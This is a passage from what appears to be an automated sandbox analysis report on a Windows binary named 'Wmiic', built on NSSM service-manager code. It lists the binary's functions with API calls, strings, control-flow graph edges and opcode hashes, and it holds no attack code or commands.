669->672 672->668 678 1400124f3-1400124f5 674->678 675->646 680 140012511-140012514 call 140011130 678->680 681 1400124f7-14001250f call 140017f4c call 1400026b0 678->681 680->675 681->646
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$AllocProcess_snwprintf_s
                                                                                                                                                                                                    • String ID: LocalSystem$canon$edit_service()
                                                                                                                                                                                                    • API String ID: 3659976305-2564672073
                                                                                                                                                                                                    • Opcode ID: c2f84ec46b8393c74ca8ca84993f5637c0292e65ffba0c481b9bd538b89089a5
                                                                                                                                                                                                    • Instruction ID: e3b5c0a1dd0221c7c68a33bde828070b828dc71daee6d23759004c629932d6ba
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2f84ec46b8393c74ca8ca84993f5637c0292e65ffba0c481b9bd538b89089a5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACA17E72204B8192EB26DB22E4443DA73A1F788BD4F444126FB99477A5DF39C965C700
                                                                                                                                                                                                    Function 00000001400133A0 Relevance: 10.6, APIs: 7, Instructions: 92COMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 3fecfab8ebf54e75fb7e5ea40beadd711431b0205b0aaf5941a53d812bb5c10a
                                                                                                                                                                                                    • Instruction ID: 7bc4927bec7be680e73558176a6a3dd42dc0bfe2cbad2d4f784c91d458048ab8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fecfab8ebf54e75fb7e5ea40beadd711431b0205b0aaf5941a53d812bb5c10a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02416D71204A8086E766EB22F4453DE73A4FB88BD0F544125FBAE87BA6EF3DC5558700
                                                                                                                                                                                                    Function 000000014000B870 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 82registryCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Event$Source$CreateDeregisterErrorLastRegisterReport_snwprintf_s
                                                                                                                                                                                                    • String ID: EventMessageFile$NSSM$SYSTEM\CurrentControlSet\Services\EventLog\Application\%s$TypesSupported$create_messages()$eventlog registry
                                                                                                                                                                                                    • API String ID: 3915943028-129066941
                                                                                                                                                                                                    • Opcode ID: 38f3f3b6c8bfc54d669350a2e0a1a664d129324a3bdfb289b21d3487b642f25c
                                                                                                                                                                                                    • Instruction ID: 65ade5d21c82d8a5f2cf4e8821feba2f506391910815b1a365cbf720ff84dd66
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38f3f3b6c8bfc54d669350a2e0a1a664d129324a3bdfb289b21d3487b642f25c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E416271204B8186E721CB62F4917DA73A5F78C7A4F404315F79947AA8DB3CC509CB00
                                                                                                                                                                                                    Function 000000014000BA30 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 97registryCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Event$Source$CreateDeregisterErrorLastRegisterReport_snwprintf_s
                                                                                                                                                                                                    • String ID: AppExit$NSSM_REG_EXIT$create_exit_action()
                                                                                                                                                                                                    • API String ID: 3915943028-2079778180
                                                                                                                                                                                                    • Opcode ID: 72daa3fbc5d415ad54047c881a5534a5db6ebd6bceb6f11fdf2c9258942a3b44
                                                                                                                                                                                                    • Instruction ID: ccaac05e6ae8247f9b9043b8869667f207f6f4575daf8edcbf1287825eb9e7ed
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 72daa3fbc5d415ad54047c881a5534a5db6ebd6bceb6f11fdf2c9258942a3b44
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6415F71208B8186EB61CB62F8857DAB3A5F78C794F440226BB9D43BA9DF78C545CB00
                                                                                                                                                                                                    Function 0000000140018F98 Relevance: 13.6, APIs: 9, Instructions: 98COMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DecodePointer$_initterm$ExitProcess_lock
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2551688548-0
                                                                                                                                                                                                    • Opcode ID: 6175295708fc991cf33cc86d77c261edfb25d46c176234fe335448c5724ce638
                                                                                                                                                                                                    • Instruction ID: c03ffe64fd4b435e30c5ae8a24083b9de1078ef0a929f37934195ca75bf9864d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6175295708fc991cf33cc86d77c261edfb25d46c176234fe335448c5724ce638
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F416D31216A9085FA539B17F8443D96295F78C7C4F144429FB4D4B7BAEF3AC992C740
                                                                                                                                                                                                    Function 0000000140002530 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 48memorywindowCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FormatHeapMessage$AllocDefaultProcessUser_snwprintf_s
                                                                                                                                                                                                    • String ID: system error %lu
                                                                                                                                                                                                    • API String ID: 3536280399-1824642319
                                                                                                                                                                                                    • Opcode ID: aaa1bbfdd9c70fa5ff9d64c30cbb850859592f88a9e14e0967e5c3d2bea55925
                                                                                                                                                                                                    • Instruction ID: 8ac30a1a1620e7ed145e822f26d1194f441ec5727b48fbd65988fd17af8cf97c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: aaa1bbfdd9c70fa5ff9d64c30cbb850859592f88a9e14e0967e5c3d2bea55925
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60118271614B8182E721DF62F814796B791FB8C7A9F004238AB9943BE4EF3CC5488B00
                                                                                                                                                                                                    Function 000000014002118C Relevance: 12.1, APIs: 8, Instructions: 89COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __doserrno_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 921712934-0
                                                                                                                                                                                                    • Opcode ID: 8d9561d498963158f19ad26a3a68302db72698de20c15f67894f9640bdee3b33
                                                                                                                                                                                                    • Instruction ID: 0ddb69c9fbd17f45a9d6bfcdc64467eb0070a41d15bfb506f601218df6432c84
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d9561d498963158f19ad26a3a68302db72698de20c15f67894f9640bdee3b33
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8831CF32A1025086F3135FB7A8427DE7659A7C9BE0F594619FB254B7F2CB39C8128B04
                                                                                                                                                                                                    Function 0000000140013B00 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 131COMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0000000140010290: GetProcessHeap.KERNEL32(?,?,?,?,?,0000000140004171), ref: 0000000140010296
                                                                                                                                                                                                      • Part of subcall function 0000000140010290: HeapAlloc.KERNEL32(?,?,?,?,?,0000000140004171), ref: 00000001400102AA
                                                                                                                                                                                                    • _snwprintf_s.LIBCMT ref: 0000000140013B41
                                                                                                                                                                                                    • _snwprintf_s.LIBCMT ref: 0000000140013BC9
                                                                                                                                                                                                      • Part of subcall function 00000001400026B0: _vfwprintf_p.LIBCMT ref: 00000001400026E1
                                                                                                                                                                                                      • Part of subcall function 00000001400026B0: LocalFree.KERNEL32(?,?,?,00000000,0000000140001065), ref: 00000001400026E9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap_snwprintf_s$AllocFreeLocalProcess_vfwprintf_p
                                                                                                                                                                                                    • String ID: pre_install_service()$service
                                                                                                                                                                                                    • API String ID: 3309010533-3337766052
                                                                                                                                                                                                    • Opcode ID: a4fe2850516496a6d6bef16b651254128269590410b47283ba75cfab8d25e80a
                                                                                                                                                                                                    • Instruction ID: 1f3a638b6378999b6819d25118dd32754412a06506d8dd69f99bcf8c10b9a7c2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4fe2850516496a6d6bef16b651254128269590410b47283ba75cfab8d25e80a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9051C272614A8582EA12EB26E4013DA6365F7487F4F455322BFBA5B7E6DF39C542C300
                                                                                                                                                                                                    Function 0000000140019FF0 Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 887 140019ff0-14001a036 GetStartupInfoA call 14001a34c 890 14001a038-14001a03b 887->890 891 14001a040-14001a059 887->891 892 14001a2bb-14001a2dc 890->892 893 14001a05b-14001a096 891->893 894 14001a09e-14001a0a4 891->894 893->893 897 14001a098 893->897 895 14001a1f3-14001a1f6 894->895 896 14001a0aa-14001a0b2 894->896 899 14001a1f9-14001a20b 895->899 896->895 898 14001a0b8-14001a0d3 896->898 897->894 900 14001a166 898->900 901 14001a0d9 898->901 902 14001a219-14001a241 GetStdHandle 899->902 903 14001a20d-14001a211 899->903 906 14001a16d-14001a173 900->906 904 14001a0e0-14001a0f3 call 14001a34c 901->904 907 14001a243-14001a246 902->907 908 14001a28d-14001a291 902->908 903->902 905 14001a213-14001a217 903->905 921 14001a0f5-14001a112 904->921 922 14001a15e-14001a164 904->922 910 14001a298-14001a2a2 905->910 906->895 911 14001a175-14001a179 906->911 907->908 912 14001a248-14001a254 GetFileType 907->912 908->910 910->899 915 14001a2a8-14001a2b6 SetHandleCount 910->915 916 14001a1e6-14001a1f1 911->916 917 14001a17b-14001a17f 911->917 912->908 913 14001a256-14001a25f 912->913 919 14001a261-14001a265 913->919 920 14001a267-14001a26a 913->920 915->892 916->895 916->911 917->916 918 14001a181-14001a186 917->918 918->916 923 14001a188-14001a18d 918->923 924 14001a270-14001a281 call 14001e5e4 919->924 920->924 925 14001a26c 920->925 926 14001a114-14001a14d 921->926 927 14001a155-14001a15a 921->927 922->906 928 14001a19d-14001a1d5 call 14001e5e4 923->928 929 14001a18f-14001a19b GetFileType 923->929 936 14001a283-14001a286 924->936 937 14001a288-14001a28b 924->937 925->924 926->926 931 14001a14f 926->931 927->904 932 14001a15c 927->932 938 14001a1d7-14001a1dc 928->938 939 14001a1de-14001a1e1 928->939 929->916 929->928 931->927 932->906 936->910 937->892 938->916 939->892
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetStartupInfoA.KERNEL32 ref: 000000014001A015
                                                                                                                                                                                                      • Part of subcall function 000000014001A34C: Sleep.KERNEL32(?,?,?,000000014001C657,?,?,00000000,000000014001B8C5,?,?,?,?,0000000140018C63), ref: 000000014001A391
                                                                                                                                                                                                    • GetFileType.KERNEL32 ref: 000000014001A192
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileInfoSleepStartupType
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1527402494-0
                                                                                                                                                                                                    • Opcode ID: 3f51e10bc0a05a402e61eb3b2245a11eee57e2e3cb1c958024df1f49150fad7b
                                                                                                                                                                                                    • Instruction ID: 7a3fca090f6ba9f5ab9e1a2497757437a20a6ef231ed88d5b265d648ccddedd5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f51e10bc0a05a402e61eb3b2245a11eee57e2e3cb1c958024df1f49150fad7b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F916F31604A8085E7528B2AD84879937A5F30B7F4F658B25EB794B3F1DB7EC886C311
                                                                                                                                                                                                    Function 0000000140019E44 Relevance: 7.6, APIs: 5, Instructions: 99COMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CommandInitializeLine_cinit
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2063639010-0
                                                                                                                                                                                                    • Opcode ID: 334057000040a9cd6d33974f80b254a5e394fd5272b937c64bc8013a74fed007
                                                                                                                                                                                                    • Instruction ID: 49bd52d0a6cb84c4fc261c0c752a8ca64d3d73b004f0ff5055fbb52a34e6a74c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 334057000040a9cd6d33974f80b254a5e394fd5272b937c64bc8013a74fed007
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B41113160474186F763ABA7A4913E932A1AB9D3C4F54043DBB458F2F7DB3AC941C711
                                                                                                                                                                                                    Function 0000000140010290 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 21memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1002 140010290-1400102b6 GetProcessHeap HeapAlloc 1003 1400102b8-1400102db call 1400025f0 1002->1003 1004 1400102de-1400102e3 1002->1004 1003->1004
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(?,?,?,?,?,0000000140004171), ref: 0000000140010296
                                                                                                                                                                                                    • HeapAlloc.KERNEL32(?,?,?,?,?,0000000140004171), ref: 00000001400102AA
                                                                                                                                                                                                      • Part of subcall function 00000001400025F0: RegisterEventSourceW.ADVAPI32 ref: 0000000140002613
                                                                                                                                                                                                      • Part of subcall function 00000001400025F0: ReportEventW.ADVAPI32 ref: 0000000140002688
                                                                                                                                                                                                      • Part of subcall function 00000001400025F0: DeregisterEventSource.ADVAPI32 ref: 0000000140002691
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Event$HeapSource$AllocDeregisterProcessRegisterReport
                                                                                                                                                                                                    • String ID: alloc_nssm_service()$service
                                                                                                                                                                                                    • API String ID: 1868725766-2157636798
                                                                                                                                                                                                    • Opcode ID: 340dcb3ea64f2eaa611f07df5ba2ae7dbefa44cddf1a4083a5f2c707a3498489
                                                                                                                                                                                                    • Instruction ID: 68c9e48bc270ec39d5ec3dc1802da48655ef9d9f8276d5f31e599d5297850325
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 340dcb3ea64f2eaa611f07df5ba2ae7dbefa44cddf1a4083a5f2c707a3498489
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5EE0D834611B9982FF029F62A4143DA6390A74D784F480029EE894B375EF3CC9498B00
                                                                                                                                                                                                    Function 0000000140001D10 Relevance: 6.0, APIs: 4, Instructions: 19threadCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1007 140001d10-140001d1d GetConsoleWindow 1008 140001d4a-140001d50 1007->1008 1009 140001d1f-140001d2f GetWindowThreadProcessId 1007->1009 1009->1008 1010 140001d31-140001d3b GetCurrentProcessId 1009->1010 1011 140001d44 FreeConsole 1010->1011 1012 140001d3d-140001d43 1010->1012 1011->1008
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ConsoleProcessWindow$CurrentFreeThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3525601419-0
                                                                                                                                                                                                    • Opcode ID: 29e15103fe5f831a4dd6db545d7f1efa3da3bd332465f4f0af65380b46d4571c
                                                                                                                                                                                                    • Instruction ID: 8be19064b400df3bdc88df37d5e9ee8f6c9001a69cbb9b9d9eb637b770bdfd16
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 29e15103fe5f831a4dd6db545d7f1efa3da3bd332465f4f0af65380b46d4571c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9CE0E675A11581D3EE56AF23B8453D923A0BB9CB81FC45019F7464B674EF3CD9498710
                                                                                                                                                                                                    Function 000000014000B770 Relevance: 4.6, APIs: 3, Instructions: 61registryCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1013 14000b770-14000b796 1014 14000b798-14000b7c6 RegCreateKeyExW 1013->1014 1015 14000b7cd-14000b7ec RegOpenKeyExW 1013->1015 1016 14000b827-14000b843 1014->1016 1017 14000b7c8-14000b7cb 1014->1017 1015->1016 1018 14000b7ee-14000b7f6 1015->1018 1019 14000b7fd-14000b822 GetLastError call 140002430 call 1400025f0 1017->1019 1018->1019 1020 14000b7f8-14000b7fb 1018->1020 1019->1016 1020->1016 1020->1019
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
